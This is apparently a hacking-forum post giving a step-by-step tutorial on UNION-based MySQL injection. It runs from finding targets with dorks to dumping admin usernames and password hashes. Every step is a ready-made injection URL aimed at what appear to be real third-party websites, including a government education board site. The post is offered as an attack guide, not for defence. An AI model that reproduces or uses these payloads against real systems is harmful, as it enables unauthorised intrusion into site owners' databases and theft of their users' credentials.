SQL [TUT]

I have not included tutorial for version less than 4 and blind coz according to me more than 80 % sql injections this way :biggrin:

1. USE DORKS TO FIND SITES

http://f47al3rr0r.net/forum/showthread.php?tid=10

Credits : Biohazard

2.CHECK WHETHER THE SITE IS VULNERABLE

put a ' infront of the page .

if it does not reload in its original format it is vulnerable .

eg.

Nothing is shown on page So it might be possible it is vulnerable

P.S:

P.S:
if you get error like this it is not MYSQL injection it's MSSQL


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

so find a good MSSQL tutorial

3.FINDING NUMBER OF COLUMNS IN SQL DATABASE

Quote:http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10-- ERROR

SO COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5-- ERROR
SO COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO COLUMNS IN DATABASE IS 4


4:CHECK IF UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--

watch out for minus i placed before web page number .
we do it so website only returns header and we can see useful information .
see the numbers it is showing on page .
that are the injectable column numbers

5:CHECK DATABASE VERSION

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83 cheers

6:FINDING TABLE NAMES

This sub-section is divided into two parts :

6A:WHEN ALL TABLE NAME IS SHOWED AT ONCE

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--

in this case we will see which tables are interesting
tblUsers intrigues me in this case :hehe:

6B:WHEN ONLY ONE TABLE NAME IS SHOWN THAT ALSO SOMETHING LIKE CHARACTER_SETS
here we use limit statements
example :
check this


http://www.medicalmarijuanainformation.c...roupID=-13 union select all table_name from information_schema.tables--


you will get same problem here which i mentioned above.

so your way forward will be

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use magic quotes trick to find column name along with limit ..

7. FIND COLUMNS IN DATABASE
this sub section has been divided into 2 parts :

7A.FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.c...roupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
here only one column name is displaying so i am using limit statement otherwise it would be unnecessary .
It only works if MAGIC QUOTES is off .
single quotes i placed table name is important .
IF IT doesn't work it try hexing the table name .
Google to find a hex converter and put in table name there and get it's hex .

7B.FINDING ALL COLUMN NAMES

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--


If only one column name is displaying then use the limit statement like shown above

8.DISPLAYING USER NAMES AND PASSWORDS
0x3a is hex form of ":".

http://www.medicalmarijuanainformation.c...roupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --

Quote:http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --


cracking hash , finding the hash type , finding admin page etc are out of scope of this tutorial .